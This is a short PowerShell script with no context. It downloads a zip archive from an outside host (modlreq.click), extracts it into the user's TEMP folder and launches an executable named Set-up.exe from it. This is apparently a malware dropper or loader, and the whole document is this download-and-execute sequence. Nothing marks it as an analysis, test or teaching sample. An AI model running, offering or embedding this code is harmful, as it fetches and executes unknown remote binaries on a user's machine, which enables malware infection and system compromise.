$webClient = New-Object System.Net.WebClient $url1 = "http://modlreq.click/peltgon.zip" $zipPath1 = "$env:TEMP\pgrt1.zip" $webClient.DownloadFile($url1, $zipPath1) $extractPath1 = "$env:TEMP\file" Expand-Archive -Path $zipPath1 -DestinationPath $extractPath1 Start-Process -FilePath $env:TEMP\file\Set-up.exe